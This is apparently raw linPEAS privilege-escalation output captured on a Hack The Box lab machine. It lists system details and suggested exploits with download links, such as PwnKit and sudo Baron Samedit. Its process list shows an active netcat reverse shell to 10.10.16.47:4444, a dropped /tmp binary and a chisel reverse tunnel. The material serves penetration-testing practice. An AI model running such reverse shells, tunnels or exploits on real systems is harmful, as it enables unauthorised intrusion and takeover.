bash /tmp/linpeas.sh -M -e -L -t

Do you like PEASS?
Get the latest version : https://github.com/sponsors/carlospolop
Follow on Twitter : @carlospolopm
Respect on HTB : SirBroccoli
Thank you!

linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username

Starting linpeas. Caching Writable Folders...
╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝ OS: Linux version 4.15.0-202-generic (buildd@lcy02-amd64-115) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data) Hostname: interface Writable folder: /dev/shm [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h) [+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . uniq: write error: Broken pipe DONE ╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits Linux version 4.15.0-202-generic (buildd@lcy02-amd64-115) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #213-Ubuntu SMP Thu Jan 5 19:19:12 UTC 2023 Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic ╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version Sudo version 1.8.21p2 ╔══════════╣ CVEs Check Potentially Vulnerable to CVE-2022-2588 ╔══════════╣ PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin ╔══════════╣ Date & 
uptime Sun Feb 12 11:11:57 UTC 2023 11:11:57 up 2:14, 0 users, load average: 0.16, 0.22, 0.30 ╔══════════╣ System stats Filesystem Size Used Avail Use% Mounted on udev 952M 0 952M 0% /dev tmpfs 197M 9.8M 187M 5% /run /dev/mapper/ubuntu--vg-ubuntu--lv 3.5G 3.1G 340M 91% / tmpfs 984M 4.0K 984M 1% /dev/shm tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 984M 0 984M 0% /sys/fs/cgroup /dev/sda2 219M 149M 53M 74% /boot total used free shared buff/cache available Mem: 2014888 269756 424972 14864 1320160 1542560 Swap: 1048572 268 1048304 ╔══════════╣ CPU info Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Little Endian CPU(s): 2 On-line CPU(s) list: 0,1 Thread(s) per core: 1 Core(s) per socket: 1 Socket(s): 2 NUMA node(s): 1 Vendor ID: GenuineIntel CPU family: 6 Model: 85 Model name: Intel(R) Xeon(R) Gold 5218 CPU @ 2.30GHz Stepping: 7 CPU MHz: 2294.609 BogoMIPS: 4589.21 Hypervisor vendor: VMware Virtualization type: full L1d cache: 32K L1i cache: 32K L2 cache: 1024K L3 cache: 22528K NUMA node0 CPU(s): 0,1 Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon nopl xtopology tsc_reliable nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 invpcid avx512f avx512dq rdseed adx smap clflushopt clwb avx512cd avx512bw avx512vl xsaveopt xsavec xsaves arat pku ospke md_clear flush_l1d arch_capabilities ╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) disk sda sda1 sda2 sda3 ╔══════════╣ Unmounted file-system? 
╚ Check if you can mount umounted devices /dev/disk/by-id/dm-uuid-LVM-i3pCcRu1s0TOrvFh0JfLWwVAmyM66tqgFue8hxoPZWT54KAfm6w6w9SmET94QCTF / ext4 defaults 0 0 /dev/disk/by-uuid/9a15dfee-5052-4de7-86fb-b3ec2b2069ec /boot ext4 defaults 0 0 /dev/mapper/ubuntu--vg-swap none swap sw 0 0 ╔══════════╣ Environment ╚ Any private information inside environment variables? LANG=C USER=www-data PWD=/var/www/.gnupg HOME=/var/www HISTFILE=/dev/null SHLVL=1 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin HISTSIZE=0 HISTFILESIZE=0 _=/usr/bin/env ╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed dmesg Not Found ╔══════════╣ Executing Linux Exploit Suggester ╚ https://github.com/mzet-/linux-exploit-suggester cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe cat: write error: Broken pipe [+] [CVE-2021-4034] PwnKit Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: probable Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main [+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: mint=19,[ ubuntu=18|20 ], debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-3156] sudo Baron Samedit 2 Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main [+] [CVE-2018-18955] subuid_shell Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 Exposure: 
probable Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28} Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip Comments: CONFIG_USER_NS needs to be enabled [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET) Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/ https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Exposure: less probable Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2022-2586] nft_object UAF Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: less probable Tags: ubuntu=(20.04){kernel:5.12.13} Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2021-22555] Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded [+] [CVE-2019-18634] sudo pwfeedback Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ Exposure: less probable Tags: mint=19 Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c Comments: sudo configuration requires pwfeedback to be enabled. 
[+] [CVE-2019-15666] XFRM_UAF Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc Exposure: less probable Download URL: Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled [+] [CVE-2017-5618] setuid screen v4.5.0 LPE Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154 [+] [CVE-2017-0358] ntfs-3g-modprobe Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072 Exposure: less probable Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2} Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores. ╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2 ╔══════════╣ Protections ═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set. apparmor module is loaded. ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Seccomp enabled? ............... disabled ═╣ AppArmor profile? .............. unconfined ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... enabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (vmware) ╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present /usr/bin/lxc ╔══════════╣ Am I Containered? ╔══════════╣ Container details ═╣ Is this a container? ........... 
No ═╣ Any running containers? ........ No ╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ ╚═══════╝ ═╣ Google Cloud Platform? ............... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. No ═╣ AWS Lambda? .......................... No ╔════════════════════════════════════════════════╗ ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes ╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0.0 0.4 159652 8792 ? Ss 08:57 0:03 /sbin/init maybe-ubiquity root 524 0.2 0.8 95016 16212 ? S&1|nc 10.10.16.47 4444 >/tmp/f www-data 3169 0.0 0.0 4680 816 ? S 10:41 0:00 | _ cat /tmp/f www-data 3170 0.0 0.0 4636 1676 ? S 10:41 0:00 | _ sh -i www-data 3189 0.1 0.2 9760 4320 ? Sl 10:42 0:03 | | _ /tmp/NJwcm www-data 14831 0.0 0.0 4636 828 ? S 10:47 0:00 | | _ /bin/sh www-data 14832 0.0 0.2 20344 5148 ? S 10:47 0:00 | | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 39396 0.0 0.2 20344 4084 ? S 11:00 0:00 | | | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 40732 0.0 0.2 20344 4204 ? S 11:00 0:00 | | | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 40734 0.0 0.0 11468 1016 ? S 11:00 0:00 | | | | _ grep -A 256 Ports going to be scanned www-data 40735 0.0 0.0 11468 1088 ? S 11:00 0:00 | | | | _ grep -v Ports going to be scanned www-data 14833 0.0 0.0 4544 828 ? S 10:47 0:00 | | | _ tee /tmp/peas.log www-data 22118 0.0 0.0 4636 820 ? S 10:51 0:00 | | _ /bin/sh www-data 22141 0.0 0.4 718304 8292 ? Sl 10:52 0:00 | | | _ ./chisel client 10.10.16.47:8000 R:3000:127.0.0.1:3000 www-data 44089 0.0 0.0 4636 880 ? S 11:11 0:00 | | _ /bin/sh www-data 44091 0.7 0.2 20344 5180 ? S 11:11 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t www-data 47476 0.0 0.1 20344 3900 ? 
S 11:12 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t
www-data 47479 0.0 0.1 37020 3520 ? R 11:12 0:00 | | | _ ps fauxwww
www-data 47480 0.0 0.1 20344 2332 ? S 11:12 0:00 | | _ bash /tmp/linpeas.sh -M -e -L -t
www-data 3171 0.0 0.1 15720 2108 ? S 10:41 0:00 | _ nc 10.10.16.47 4444
www-data 1387 0.0 1.0 325212 20564 ? S 08:57 0:00 _ php-fpm: pool www
message+ 1292 0.0 0.2 50132 4620 ? Ss 08:57 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 1348 0.1 0.1 457232 2036 ? Ssl 08:57 0:08 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 1382 0.0 0.2 263048 4388 ? Ssl 08:57 0:00 /usr/sbin/rsyslogd -n
root 1399 0.0 0.8 169524 17548 ? Ssl 08:57 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 1402 0.0 0.2 62012 5548 ? Ss 08:57 0:00 /lib/systemd/systemd-logind
root 1477 0.0 0.2 72304 5760 ? Ss 08:57 0:00 /usr/sbin/sshd -D
root 1478 0.0 0.3 288884 6584 ? Ssl 08:57 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 1498 0.0 0.0 14896 1924 tty1 Ss+ 08:57 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 1625 0.0 0.0 142884 1584 ? Ss 08:57 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 1627 0.0 0.3 145180 6296 ? S 08:57 0:00 _ nginx: worker process
www-data 1628 0.0 0.3 145180 7248 ? S 08:57 0:00 _ nginx: worker process
www-data 3196 0.0 0.2 20340 5056 ? S 10:43 0:00 bash /tmp/linpeas.sh -M -e -L -t
www-data 10388 0.0 0.1 20340 3900 ? S 10:45 0:00 _ bash /tmp/linpeas.sh -M -e -L -t
www-data 11709 0.0 0.2 20340 4128 ? S 10:45 0:00 _ bash /tmp/linpeas.sh -M -e -L -t
www-data 11711 0.0 0.0 11468 1048 ? S 10:45 0:00 _ grep -A 256 Ports going to be scanned
www-data 11712 0.0 0.0 11468 980 ? S 10:45 0:00 _ grep -v Ports going to be scanned
root 9709 0.0 0.0 4560 756 ? Ss 10:44 0:00 /usr/sbin/acpid
uuidd 9948 0.0 0.0 26856 1456 ? Ss 10:44 0:00 /usr/sbin/uuidd --socket-activation
www-data 22149 0.1 0.2 21276 6000 ?
S 10:53 0:01 bash linpeas.sh www-data 39291 0.0 0.0 11076 1064 ? S 10:54 0:00 _ aureport --tty www-data 39292 0.0 0.0 11468 1032 ? S 10:54 0:00 _ grep -E su |sudo www-data 29484 0.0 0.0 90388 716 ? Ss 10:54 0:00 gpg-agent --homedir /var/www/.gnupg --use-standard-socket --daemon ╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 Not Found sshd Not Found ╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab /etc/cron.d: total 24 drwxr-xr-x 2 root root 4096 Jan 16 09:49 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rw-r--r-- 1 root root 589 Jan 14 2020 mdadm -rw-r--r-- 1 root root 712 Jan 11 2022 php -rw-r--r-- 1 root root 191 Aug 6 2020 popularity-contest /etc/cron.daily: total 60 drwxr-xr-x 2 root root 4096 Feb 6 10:02 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. 
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 539 Feb 23 2021 apache2 -rwxr-xr-x 1 root root 376 Nov 11 2019 apport -rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg -rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate -rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db -rwxr-xr-x 1 root root 539 Jan 14 2020 mdadm -rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate -rwxr-xr-x 1 root root 249 Jan 25 2018 passwd -rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest -rwxr-xr-x 1 root root 214 Nov 12 2018 update-notifier-common /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Jan 16 09:49 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Jan 16 09:49 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. -rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder /etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Feb 6 10:01 . drwxr-xr-x 99 root root 4096 Feb 6 10:02 .. 
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder -rwxr-xr-x 1 root root 723 Apr 7 2018 man-db -rwxr-xr-x 1 root root 403 Aug 23 2021 update-notifier-common SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) ╔══════════╣ Services ╚ Search for outdated versions [ + ] acpid [ + ] apache-htcacheclean [ - ] apache2 [ + ] apparmor [ + ] apport [ + ] atd [ + ] auditd [ - ] console-setup.sh [ + ] cron [ - ] cryptdisks [ - ] cryptdisks-early [ + ] dbus [ + ] ebtables [ + ] grub-common [ - ] hwclock.sh [ + ] irqbalance [ + ] iscsid [ - ] keyboard-setup.sh [ + ] kmod [ - ] lvm2 [ + ] lvm2-lvmetad [ + ] lvm2-lvmpolld [ + ] lxcfs [ - ] lxd [ - ] mdadm [ - ] mdadm-waitidle [ + ] networking [ + ] nginx [ - ] open-iscsi [ + ] open-vm-tools [ + ] php7.4-fpm [ - ] plymouth [ - ] plymouth-log [ + ] procps [ - ] rsync [ + ] rsyslog [ - ] screen-cleanup [ + ] ssh [ + ] udev [ + ] uuidd ╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin ╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services /etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path /etc/systemd/system/network-online.target.wants/networking.service is executing some relative path You can't write on systemd PATH ╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Sun 2023-02-12 11:39:00 UTC 26min left Sun 2023-02-12 11:09:02 UTC 3min 27s 
ago phpsessionclean.timer phpsessionclean.service Sun 2023-02-12 11:53:35 UTC 41min left Sun 2023-02-12 08:57:52 UTC 2h 14min ago motd-news.timer motd-news.service Sun 2023-02-12 15:22:31 UTC 4h 10min left Sun 2023-02-12 09:17:20 UTC 1h 55min ago ua-timer.timer ua-timer.service Sun 2023-02-12 18:24:06 UTC 7h left Sun 2023-02-12 08:57:52 UTC 2h 14min ago apt-daily.timer apt-daily.service Mon 2023-02-13 00:00:00 UTC 12h left Mon 2023-02-06 09:52:53 UTC 6 days ago fstrim.timer fstrim.service Mon 2023-02-13 06:56:31 UTC 19h left Sun 2023-02-12 08:57:52 UTC 2h 14min ago apt-daily-upgrade.timer apt-daily-upgrade.service Mon 2023-02-13 09:12:42 UTC 22h left Sun 2023-02-12 09:12:42 UTC 1h 59min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service ╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /etc/systemd/system/cloud-init.target.wants/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd /etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request /lib/systemd/system/cloud-init-hotplugd.socket is calling this writable listener: /run/cloud-init/hook-hotplug-cmd /lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout 
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog /lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request ╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /run/acpid.socket └─(Read Write - Can Connect) /run/dbus/system_bus_socket └─(Read Write - Can Connect) /run/lvm/lvmetad.socket └─( - Cannot Connect) /run/lvm/lvmpolld.socket └─( - Cannot Connect) /run/php/php7.4-fpm.sock └─(Read Write - Can Connect) /run/snapd-snap.socket └─(Read Write - Can Connect) /run/snapd.socket └─(Read Write - Can Connect) /run/systemd/journal/dev-log └─(Read Write - Can Connect) /run/systemd/journal/socket └─(Read Write - Can Connect) /run/systemd/journal/stdout └─(Read Write - Can Connect) /run/systemd/journal/syslog └─(Read Write - Can Connect) /run/systemd/notify └─(Read Write - Can Connect) /run/systemd/private └─(Read Write - Can Connect) /run/udev/control └─( - Cannot Connect) /run/uuidd/request └─(Read Write - Can Connect) /run/vmware/guestServicePipe └─(Read Write - Can Connect) /var/lib/lxd/unix.socket └─( - Cannot Connect) /var/run/dbus/system_bus_socket └─(Read Write - Can Connect) /var/run/vmware/guestServicePipe └─(Read Write - Can Connect) /var/www/.gnupg/S.gpg-agent └─(Read Write - Can Connect) /var/www/.gnupg/S.gpg-agent.browser └─(Read Write - Can Connect) /var/www/.gnupg/S.gpg-agent.extra └─(Read Write - Can Connect) /var/www/.gnupg/S.gpg-agent.ssh └─(Read Write - Can Connect) 
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/dnsmasq.conf ( )
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( )
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 1059 systemd-network systemd-network :1.0 systemd-networkd.service - -
:1.1 1139 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
:1.2 1 systemd root :1.2 init.scope - -
:1.3 1289 accounts-daemon root :1.3 accounts-daemon.service - -
:1.433 51087 snapd root :1.433 snapd.service - -
:1.434 51158 systemd-timedat root :1.434 systemd-timedated.service - -
:1.436 51415 busctl www-data :1.436 php7.4-fpm.service - -
:1.5 1402 systemd-logind root :1.5 systemd-logind.service - -
:1.6 1478 polkitd root :1.6 polkit.service - -
:1.7 1399 networkd-dispat root :1.7 networkd-dispatcher.se…ce - -
com.ubuntu.LanguageSelector - - - (activatable) - -
com.ubuntu.SoftwareProperties - - - (activatable) - -
org.freedesktop.Accounts 1289 accounts-daemon root :1.3 accounts-daemon.service - -
org.freedesktop.DBus 1 systemd root - init.scope - -
org.freedesktop.PolicyKit1 1478 polkitd root :1.6 polkit.service - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
org.freedesktop.login1 1402 systemd-logind root :1.5 systemd-logind.service - -
org.freedesktop.network1 1059 systemd-network systemd-network :1.0 systemd-networkd.service - -
org.freedesktop.resolve1 1139 systemd-resolve systemd-resolve :1.1 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.2 init.scope - -
org.freedesktop.thermald - - - (activatable) - -
org.freedesktop.timedate1 51158 systemd-timedat root :1.434 systemd-timedated.service - -
╔═════════════════════╗ ══════════════════════════════╣ Network 
Information ╠══════════════════════════════ ╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
interface
127.0.0.1 localhost interface interface.htb
127.0.1.1 interface
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0
╔══════════╣ Content of /etc/inetd.conf & /etc/xinetd.conf
/etc/inetd.conf Not Found
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163 mtu 1500
inet 10.129.18.131 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 fe80::250:56ff:feb9:6684 prefixlen 64 scopeid 0x20
inet6 dead:beef::250:56ff:feb9:6684 prefixlen 64 scopeid 0x0
ether 00:50:56:b9:66:84 txqueuelen 1000 (Ethernet)
RX packets 30700 bytes 32636656 (32.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20991 bytes 2787551 (2.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 12767 bytes 1125794 (1.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12767 bytes 1125794 (1.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Networks and neighbours
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 10.129.0.1 0.0.0.0 UG 0 0 0 eth0
10.129.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
╔══════════╣ Iptables rules
iptables rules Not Found
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1627/nginx: worker
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN 1759/node
tcp6 0 0 :::80 :::* LISTEN 1627/nginx: worker
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔══════════╣ Internet Access?
Ping is not available Port 80 is not accessible Port 443 is not accessible DNS not available ╔══════════╣ Scanning local networks (using /24) ══╣ Discovering hosts in 10.129.18.131/24
══╣ Scanning top ports of host.docker.internal ╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=33(www-data) gid=33(www-data) groups=33(www-data) ╔══════════╣ Do I have PGP keys? 
